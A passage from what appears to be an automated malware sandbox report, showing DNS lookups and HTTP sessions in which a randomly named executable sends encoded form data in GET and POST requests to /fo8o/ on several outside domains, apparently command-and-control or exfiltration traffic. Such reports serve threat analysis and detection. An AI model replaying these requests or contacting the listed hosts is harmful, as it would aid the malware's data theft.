                                                                                    Jan 7, 2025 15:34:58.008301020 CET1.1.1.1192.168.2.50x6b99No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 7, 2025 15:34:58.008301020 CET1.1.1.1192.168.2.50x6b99No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:11.366904974 CET1.1.1.1192.168.2.50xacf6Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:19.580524921 CET1.1.1.1192.168.2.50x461eName error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:27.683727026 CET1.1.1.1192.168.2.50xf65aNo error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:27.683727026 CET1.1.1.1192.168.2.50xf65aNo error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:40.897267103 CET1.1.1.1192.168.2.50x14ddName error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:48.959638119 CET1.1.1.1192.168.2.50x6bb3Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 7, 2025 15:35:57.054841995 CET1.1.1.1192.168.2.50xe2acName error (3)www.shenzhoucui.comnonenoneA (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.3xfootball.com
                                                                                    • www.goldenjade-travel.com
                                                                                    • www.magmadokum.com
                                                                                    • www.rssnewscast.com
                                                                                    • www.techchains.info
                                                                                    • www.elettrosistemista.zip
                                                                                    • www.empowermedeco.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549736154.215.72.110803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:32:23.375811100 CET519OUTGET /fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.3xfootball.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:32:24.303663015 CET691INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Tue, 07 Jan 2025 14:32:24 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 548
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549888116.50.37.244803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:32:47.787595987 CET801OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 2b 79 4d 67 4b 55 66 37 6c 6e 42 53 54 58 45 45 48 35 64 65 51 72 61 55 31 34 63 4a 5a 61 50 52 57 73 55 6b 58 34 3d
                                                                                    Data Ascii: FPJps=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
                                                                                    Jan 7, 2025 15:32:48.676845074 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:48 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.549898116.50.37.244803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:32:50.314866066 CET821OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 69 45 6d 77 72 59 70 37 6d 4c 31 38 6b 36 41 73 61 6a 77 35 2b 79 65 78 79 78 34 52 73 72 55 72 4f 70 64 44 34
                                                                                    Data Ascii: FPJps=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHiEmwrYp7mL18k6Asajw5+yexyx4RsrUrOpdD4
                                                                                    Jan 7, 2025 15:32:51.192833900 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:50 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.549917116.50.37.244803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:32:52.846255064 CET1838OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Origin: http://www.goldenjade-travel.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 32 4e 5a 54 68 6e 6e 4c 6d 38 30 4d 2f 75 45 57 32 34 4a 38 33 59 2f 75 7a 5a 41 38 72 41 79 36 5a 78 35 31 77 37 47 6f 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 78 4e 46 47 67 41 5a 64 49 78 6b 61 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a [TRUNCATED]
                                                                                    Data Ascii: FPJps=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL2NZThnnLm80M/uEW24J83Y/uzZA8rAy6Zx51w7GoYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldxNFGgAZdIxkafgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB3wpOPRMSckz22D7oIJ1pT3kmt5OAzJQX0rpd4H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7r8VUpMLRkY6c3P8G0fpnTUDkLQscQKtCpBC0WjC/PZq9AVPUPhBBD5/Dig7vxPgCc2pVcvipTzijVIvgKAdFC7i2pC8gbNWoNVRZMX415Goc9ACqxlKDTbGvtkaduGagDzKCszB0YP2v04KI092MQf7ousTmtftOjO7F0nipoP+ae415ShjaJt52G5Y6AFhRSUFLstJAda1ItR8M9j/L3g9nYAAaYrZcsa4vZMQvEH+ZAtHeztq24kQbanf5ovMXFmxG2hPDmBOxYxWsGXxwqxAE4UChtzmKyovtMK56OZLEgKSJviIqU3z0dUvGszLNpCkWZsAqG3JpcHhuqqwQv6sb+TG8VHQhAkXO4dCk+vc59h2hhsQCETtYQj2hDGYgZtAbx5kvk5+K7Gl1SaKXYmnS6DbpM5fRwWGzllkVCSq+ddNwmCqpgcn42aU+9x/xCJsUgMK3AP/fEJ4db0U1RRo7K/TxrU/5+U+u6hHJplkdFUrMBIcY0SOK4eWxpJ3wpdR7JATPJiykjxVF [TRUNCATED]
                                                                                    Jan 7, 2025 15:32:53.748708010 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:53 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.549933116.50.37.244803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:32:55.377645016 CET526OUTGET /fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.goldenjade-travel.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 7, 2025 15:32:56.244842052 CET492INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Tue, 07 Jan 2025 14:32:55 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 315
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.54998185.159.66.93803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:33:09.448369026 CET780OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 46 50 4a 70 73 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 48 43 46 59 72 4d 39 61 51 75 33 56 78 63 4f 51 38 59 6d 39 5a 44 32 48 32 7a 46 43 44 33 67 72 48 6b 72 34 47 4d 3d
                                                                                    Data Ascii: FPJps=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0HCFYrM9aQu3VxcOQ8Ym9ZD2H2zFCD3grHkr4GM=


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.54998285.159.66.93803724C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 15:33:11.990180969 CET800OUTPOST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.magmadokum.com
                                                                                    Origin: http://www.magmadokum.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.magmadokum.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
